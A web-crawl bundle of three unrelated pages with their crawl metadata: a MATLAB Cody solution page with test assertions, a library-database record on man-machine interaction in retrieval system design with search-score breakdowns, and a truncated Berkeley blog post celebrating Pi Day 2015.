{"ft_lang_label":"__label__en","ft_lang_prob":0.88471824,"math_prob":0.9381979,"size":3944,"snap":"2019-43-2019-47","text_gpt3_token_len":899,"char_repetition_ratio":0.12461929,"word_repetition_ratio":0.2640264,"special_character_ratio":0.22895537,"punctuation_ratio":0.15866667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9880707,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-15T22:38:56Z\",\"WARC-Record-ID\":\"<urn:uuid:da39d065-f648-4436-9f9b-5d03724ffd73>\",\"Content-Length\":\"145032\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5757ba40-8cda-4184-a20e-6e966a8a6039>\",\"WARC-Concurrent-To\":\"<urn:uuid:f520e809-8fff-40cb-a3c9-0756ba09129f>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/197072/how-does-textrank-differentiate-between-keywords-and-simply-frequent-words-such\",\"WARC-Payload-Digest\":\"sha1:GHXJSWGAGSTPV6ZJVLOSDO7B7LPCE2FD\",\"WARC-Block-Digest\":\"sha1:D7B7244QO2HLM2OEIO67GLBC6KZVAXTO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668716.22_warc_CC-MAIN-20191115222436-20191116010436-00078.warc.gz\"}"}
https://de.mathworks.com/matlabcentral/cody/problems/1807-04-scalar-equations-2/solutions/2802925
[ "Cody\n\n# Problem 1807. 04 - Scalar Equations 2\n\nSolution 2802925\n\nSubmitted on 6 Aug 2020 by Sanveg Rane\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\na=10; b=2.5e23; ref = (sqrt(a)+b^(1/21))^pi; user = MyFunc(); assert(isequal(user,ref))\n\n2   Pass\n[y a b] = MyFunc(); assert(a==10);\n\n3   Pass\n[y a b] = MyFunc(); assert(b==2.5e23);" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57134473,"math_prob":0.96417063,"size":441,"snap":"2020-34-2020-40","text_gpt3_token_len":145,"char_repetition_ratio":0.14416476,"word_repetition_ratio":0.057971016,"special_character_ratio":0.39229023,"punctuation_ratio":0.14736842,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9833754,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-01T09:12:49Z\",\"WARC-Record-ID\":\"<urn:uuid:52364496-ce38-48cf-8e17-4f4a1928fc7d>\",\"Content-Length\":\"76985\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5b6cbf25-68f7-4db3-a7de-1a0896fff8e5>\",\"WARC-Concurrent-To\":\"<urn:uuid:9ca571fb-b4ca-4d34-a83b-b7eb350dee34>\",\"WARC-IP-Address\":\"104.117.0.182\",\"WARC-Target-URI\":\"https://de.mathworks.com/matlabcentral/cody/problems/1807-04-scalar-equations-2/solutions/2802925\",\"WARC-Payload-Digest\":\"sha1:7PMCC3K6KSQTHWTXLXVLCANET4VXMLYQ\",\"WARC-Block-Digest\":\"sha1:SU4FOEVO2ZIIR5YYPDCVHOEWWZBBLAVJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600402124756.81_warc_CC-MAIN-20201001062039-20201001092039-00120.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/3844
[ "# Document (#3844)\n\nAuthor\nGeyser, E.P.\nBrakel, P.A. van\nTitle\nMan-machine interaction as a factor in the design of computerised information retrieval systems\nSource\nSouth African journal of library and information science. 59(1991) no.4, S.256-260\nYear\n1991\nAbstract\nDesigners of information retrieval systems are neglecting the unique relationship between an intermediary and the search system, be it a small microcomputer database system or larger systems such as OPACs or online database hosts. When designing user-friendly retrieval systems, a thorough knowledge of the interface of the machine as well as the nature and needs of the user is needed. For this purpose, 2 modles can be distinguished, namely, the mental model of the user and the conceptual model of the designer of the system. It is the task of the system designer to make these 2 models coincide. The conceptual model is the actual model of the retrieval systems as it is presented to the user by the designer of the system. The mental model is that model of the retrieval system through past experience with a particular or a number of systems. For this reason, experienced users may have a more clearly defined model of a specific system than the novice. The nature of the communication between man and machine is also explained, as well as a number of features of the interaction between the searcher and the computer. Specific hardware and software problems relating to man-machine interaction are discussed\n\n## Similar documents (author)\n\n1. Brakel, P.A.V.: Scholarly communication in the academic environment : the potential role of Internet's World Wide Web (1995) 5.92\n```5.9235125 = sum of:\n5.9235125 = weight(author_txt:brakel in 5473) [ClassicSimilarity], result of:\n5.9235125 = fieldWeight in 5473, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.625 = fieldNorm(doc=5473)\n```\n2. Brakel, P.A. van: CD-ROM encyclopedias (1991) 4.74\n```4.73881 = sum of:\n4.73881 = weight(author_txt:brakel in 2361) [ClassicSimilarity], result of:\n4.73881 = fieldWeight in 2361, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.5 = fieldNorm(doc=2361)\n```\n3. Brakel, P.A. v.: Electronic journals : publishing via Internet's Wolrd Wide Web (1995) 4.74\n```4.73881 = sum of:\n4.73881 = weight(author_txt:brakel in 3455) [ClassicSimilarity], result of:\n4.73881 = fieldWeight in 3455, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.5 = fieldNorm(doc=3455)\n```\n4. Brakel, P.A. van: Twenty years of training in online searching : integrating the Internet with the teaching programme (1996) 4.74\n```4.73881 = sum of:\n4.73881 = weight(author_txt:brakel in 88) [ClassicSimilarity], result of:\n4.73881 = fieldWeight in 88, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.5 = fieldNorm(doc=88)\n```\n5. Mountifield, H.M.; Brakel, P.A. v.: Network-based electronic journals : a new source of information (1994) 4.15\n```4.1464586 = sum of:\n4.1464586 = weight(author_txt:brakel in 419) [ClassicSimilarity], result of:\n4.1464586 = fieldWeight in 419, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.4375 = fieldNorm(doc=419)\n```\n\n## Similar documents (content)\n\n1. Koshman, S.: Testing user interaction with a prototype visualization-based information retrieval system (2005) 0.24\n```0.24441893 = sum of:\n0.24441893 = product of:\n0.7638092 = sum of:\n0.060475033 = weight(abstract_txt:novice in 5563) [ClassicSimilarity], result of:\n0.060475033 = score(doc=5563,freq=1.0), product of:\n0.13506456 = queryWeight, product of:\n7.1639853 = idf(docFreq=90, maxDocs=43254)\n0.018853271 = queryNorm\n0.44774908 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1639853 = idf(docFreq=90, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.020776933 = weight(abstract_txt:between in 5563) [ClassicSimilarity], result of:\n0.020776933 = score(doc=5563,freq=1.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.21743497 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.06553341 = weight(abstract_txt:user in 5563) [ClassicSimilarity], result of:\n0.06553341 = score(doc=5563,freq=4.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.45990017 = fieldWeight in 5563, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.071800604 = weight(abstract_txt:interaction in 5563) [ClassicSimilarity], result of:\n0.071800604 = score(doc=5563,freq=1.0), product of:\n0.21841535 = queryWeight, product of:\n2.202579 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.018853271 = queryNorm\n0.32873425 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.048590105 = weight(abstract_txt:retrieval in 5563) [ClassicSimilarity], result of:\n0.048590105 = score(doc=5563,freq=2.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.3066987 = fieldWeight in 5563, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.03925476 = weight(abstract_txt:systems in 5563) [ClassicSimilarity], result of:\n0.03925476 = score(doc=5563,freq=1.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.21334855 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.08771419 = weight(abstract_txt:system in 5563) [ClassicSimilarity], result of:\n0.08771419 = score(doc=5563,freq=4.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.4205845 = fieldWeight in 5563, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.36966416 = weight(abstract_txt:designer in 5563) [ClassicSimilarity], result of:\n0.36966416 = score(doc=5563,freq=2.0), product of:\n0.5168835 = queryWeight, product of:\n3.3883343 = boost\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.018853271 = queryNorm\n0.7151789 = fieldWeight in 5563, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.32 = coord(8/25)\n```\n2. Geyser, E.P.: ¬A model for the evaluation of an information retrieval system in terms of user friedliness (1993) 0.24\n```0.23989287 = sum of:\n0.23989287 = product of:\n0.9995536 = sum of:\n0.12822002 = weight(abstract_txt:user in 2943) [ClassicSimilarity], result of:\n0.12822002 = score(doc=2943,freq=5.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.8998221 = fieldWeight in 2943, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.08503268 = weight(abstract_txt:retrieval in 2943) [ClassicSimilarity], result of:\n0.08503268 = score(doc=2943,freq=2.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.5367227 = fieldWeight in 2943, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.068695836 = weight(abstract_txt:systems in 2943) [ClassicSimilarity], result of:\n0.068695836 = score(doc=2943,freq=1.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.37335998 = fieldWeight in 2943, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.07674992 = weight(abstract_txt:system in 2943) [ClassicSimilarity], result of:\n0.07674992 = score(doc=2943,freq=1.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.36801144 = fieldWeight in 2943, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.45743608 = weight(abstract_txt:designer in 2943) [ClassicSimilarity], result of:\n0.45743608 = score(doc=2943,freq=1.0), product of:\n0.5168835 = queryWeight, product of:\n3.3883343 = boost\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.018853271 = queryNorm\n0.8849888 = fieldWeight in 2943, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.18341903 = weight(abstract_txt:model in 2943) [ClassicSimilarity], result of:\n0.18341903 = score(doc=2943,freq=2.0), product of:\n0.29588136 = queryWeight, product of:\n3.9159498 = boost\n4.0076866 = idf(docFreq=2136, maxDocs=43254)\n0.018853271 = queryNorm\n0.6199074 = fieldWeight in 2943, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.0076866 = idf(docFreq=2136, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.24 = coord(6/25)\n```\n3. Jouis, C.: System of types + inter-concept relations properties : towards validation of constructed terminologies (1998) 0.20\n```0.20285997 = sum of:\n0.20285997 = product of:\n0.6339374 = sum of:\n0.0319581 = weight(abstract_txt:database in 2057) [ClassicSimilarity], result of:\n0.0319581 = score(doc=2057,freq=1.0), product of:\n0.09585497 = queryWeight, product of:\n1.1913836 = boost\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.018853271 = queryNorm\n0.33340055 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.033310637 = weight(abstract_txt:specific in 2057) [ClassicSimilarity], result of:\n0.033310637 = score(doc=2057,freq=1.0), product of:\n0.09854077 = queryWeight, product of:\n1.2079592 = boost\n4.326901 = idf(docFreq=1552, maxDocs=43254)\n0.018853271 = queryNorm\n0.33803913 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.326901 = idf(docFreq=1552, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.069119655 = weight(abstract_txt:conceptual in 2057) [ClassicSimilarity], result of:\n0.069119655 = score(doc=2057,freq=2.0), product of:\n0.12723845 = queryWeight, product of:\n1.37263 = boost\n4.9167504 = idf(docFreq=860, maxDocs=43254)\n0.018853271 = queryNorm\n0.5432293 = fieldWeight in 2057, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.9167504 = idf(docFreq=860, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.025971167 = weight(abstract_txt:between in 2057) [ClassicSimilarity], result of:\n0.025971167 = score(doc=2057,freq=1.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.27179372 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.042947993 = weight(abstract_txt:retrieval in 2057) [ClassicSimilarity], result of:\n0.042947993 = score(doc=2057,freq=1.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.27108592 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.04906845 = weight(abstract_txt:systems in 2057) [ClassicSimilarity], result of:\n0.04906845 = score(doc=2057,freq=1.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.2666857 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.05482137 = weight(abstract_txt:system in 2057) [ClassicSimilarity], result of:\n0.05482137 = score(doc=2057,freq=1.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.2628653 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.32674003 = weight(abstract_txt:designer in 2057) [ClassicSimilarity], result of:\n0.32674003 = score(doc=2057,freq=1.0), product of:\n0.5168835 = queryWeight, product of:\n3.3883343 = boost\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.018853271 = queryNorm\n0.6321348 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.32 = coord(8/25)\n```\n4. Spink, A.; Cole, C.: New directions in cognitive information retrieval : conclusion and further research (2005) 0.19\n```0.18848242 = sum of:\n0.18848242 = product of:\n0.58900756 = sum of:\n0.02237067 = weight(abstract_txt:database in 1763) [ClassicSimilarity], result of:\n0.02237067 = score(doc=1763,freq=1.0), product of:\n0.09585497 = queryWeight, product of:\n1.1913836 = boost\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.018853271 = queryNorm\n0.23338039 = fieldWeight in 1763, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.03635963 = weight(abstract_txt:between in 1763) [ClassicSimilarity], result of:\n0.03635963 = score(doc=1763,freq=4.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.3805112 = fieldWeight in 1763, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.08109345 = weight(abstract_txt:user in 1763) [ClassicSimilarity], result of:\n0.08109345 = score(doc=1763,freq=8.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.5690974 = fieldWeight in 1763, product of:\n2.828427 = tf(freq=8.0), with freq of:\n8.0 = termFreq=8.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.14048216 = weight(abstract_txt:interaction in 1763) [ClassicSimilarity], result of:\n0.14048216 = score(doc=1763,freq=5.0), product of:\n0.21841535 = queryWeight, product of:\n2.202579 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.018853271 = queryNorm\n0.6431881 = fieldWeight in 1763, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.052071672 = weight(abstract_txt:retrieval in 1763) [ClassicSimilarity], result of:\n0.052071672 = score(doc=1763,freq=3.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.3286742 = fieldWeight in 1763, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.048575286 = weight(abstract_txt:systems in 1763) [ClassicSimilarity], result of:\n0.048575286 = score(doc=1763,freq=2.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.26400536 = fieldWeight in 1763, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.08670244 = weight(abstract_txt:machine in 1763) [ClassicSimilarity], result of:\n0.08670244 = score(doc=1763,freq=1.0), product of:\n0.29798394 = queryWeight, product of:\n2.970679 = boost\n5.320475 = idf(docFreq=574, maxDocs=43254)\n0.018853271 = queryNorm\n0.29096347 = fieldWeight in 1763, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.320475 = idf(docFreq=574, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.12135227 = weight(abstract_txt:system in 1763) [ClassicSimilarity], result of:\n0.12135227 = score(doc=1763,freq=10.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.5818772 = fieldWeight in 1763, product of:\n3.1622777 = tf(freq=10.0), with freq of:\n10.0 = termFreq=10.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.32 = coord(8/25)\n```\n5. Beaulieu, M.: Interaction in information searching and retrieval (2000) 0.18\n```0.17655498 = sum of:\n0.17655498 = product of:\n0.5517343 = sum of:\n0.07072253 = weight(abstract_txt:computerised in 544) [ClassicSimilarity], result of:\n0.07072253 = score(doc=544,freq=1.0), product of:\n0.14992101 = queryWeight, product of:\n1.0535631 = boost\n7.5477104 = idf(docFreq=61, maxDocs=43254)\n0.018853271 = queryNorm\n0.4717319 = fieldWeight in 544, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.5477104 = idf(docFreq=61, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.019859895 = weight(abstract_txt:well in 544) [ClassicSimilarity], result of:\n0.019859895 = score(doc=544,freq=1.0), product of:\n0.08100005 = queryWeight, product of:\n1.0951836 = boost\n3.9229398 = idf(docFreq=2325, maxDocs=43254)\n0.018853271 = queryNorm\n0.24518374 = fieldWeight in 544, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.9229398 = idf(docFreq=2325, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.029383019 = weight(abstract_txt:between in 544) [ClassicSimilarity], result of:\n0.029383019 = score(doc=544,freq=2.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.30749947 = fieldWeight in 544, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.056753594 = weight(abstract_txt:user in 544) [ClassicSimilarity], result of:\n0.056753594 = score(doc=544,freq=3.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.3982852 = fieldWeight in 544, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.22705346 = weight(abstract_txt:interaction in 544) [ClassicSimilarity], result of:\n0.22705346 = score(doc=544,freq=10.0), product of:\n0.21841535 = queryWeight, product of:\n2.202579 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.018853271 = queryNorm\n1.039549 = fieldWeight in 544, product of:\n3.1622777 = tf(freq=10.0), with freq of:\n10.0 = termFreq=10.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.048590105 = weight(abstract_txt:retrieval in 544) [ClassicSimilarity], result of:\n0.048590105 = score(doc=544,freq=2.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.3066987 = fieldWeight in 544, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.055514615 = weight(abstract_txt:systems in 544) [ClassicSimilarity], result of:\n0.055514615 = score(doc=544,freq=2.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.3017204 = fieldWeight in 544, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.043857094 = weight(abstract_txt:system in 544) [ClassicSimilarity], result of:\n0.043857094 = score(doc=544,freq=1.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.21029225 = fieldWeight in 544, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.32 = coord(8/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6823242,"math_prob":0.99832094,"size":17388,"snap":"2021-31-2021-39","text_gpt3_token_len":6678,"char_repetition_ratio":0.24913713,"word_repetition_ratio":0.44731802,"special_character_ratio":0.5367495,"punctuation_ratio":0.28198695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99980885,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-22T21:12:43Z\",\"WARC-Record-ID\":\"<urn:uuid:186b5d36-3595-4e99-94de-b8207314fb26>\",\"Content-Length\":\"32689\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:849674d7-2ca8-4fda-aaa7-faf7277cf426>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab227607-1ea4-4210-89ef-441e60622200>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/3844\",\"WARC-Payload-Digest\":\"sha1:CRST5BTFYLJ6D7LLAU56HCZ6UF6SOOSJ\",\"WARC-Block-Digest\":\"sha1:67FLNAXB24L5M33YB3ABP3DU5EFW4TXA\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057388.12_warc_CC-MAIN-20210922193630-20210922223630-00378.warc.gz\"}"}
https://blogs.berkeley.edu/2015/03/13/happy-pi-day-2015/
[ "# Happy Pi Day 2015!\n\nHojae Lee, bioengineering major | March 13, 2015\n\nBy Hojae Lee, a Berkeley Math Circle assistant, and Laura Pierson, a high-school student at The College Preparatory School, in Oakland, Calif.\n\nIt’s time to celebrate Π Day! And 3/14/15 is a special Π Day, as the date forms the first five digits of Π (3.1415), and at 9:26:53, the date and time will be the first ten digits.\n\nMost of us have heard of the famous circle constant, slightly more than three. It arises in the simplest and most natural way: the ratio of the circumference of a circle to its diameter. It has been studied for more than 2,000 years. The ancient Greek mathematician Archimedes even correctly calculated its value to three decimal places by inscribing a regular 96-sided polygon in a circle.", null, "Yet this seemingly simple number has many strange and fascinating properties. For instance, what happens when you alternately add and subtract the reciprocals of the odd numbers? Surprisingly, the sum is exactly Π/4:\n\n1 – 1/3 + 1/5 – 1/7 + … = Π/4\n\nIntuitively, you would never expect that a sum of rational numbers would be connected to the geometry of circles. The sum of the reciprocals of the squares of positive integers is also connected to p:\n\n1/12 + 1/22 + 1/32 + … = Π2/6.\n\nTake another seemingly unrelated problem, known as “Buffon’s needle.” Suppose you drop a one-inch long needle on a surface that has equally spaced lines drawn on it, each one inch apart. What is the probability that the needle will land on one of the lines? Once again, the result is unexpectedly connected to Π: the probability is 2/Π.\n\nΠ is also connected to the imaginary number i, the square root of negative one. The complex numbers (sums of ordinary real numbers and multiples of the imaginary i) have an elegant geometric representation as points in a plane, and it turns out raising a number to an imaginary power rotates it about the origin of this plane. Among other things, this leads to Euler’s famous formula\n\ne = -1,\n\nwhere e = 2.71828… is Euler’s constant.\n\nThis is what is great about math. You can take seemingly simple or unrelated ideas, and yet they turn out to be connected in surprising and beautiful ways. The world of mathematics is much stranger and more interesting than it might seem. For many Bay Area kids, the Berkeley Math Circle has been a window into this 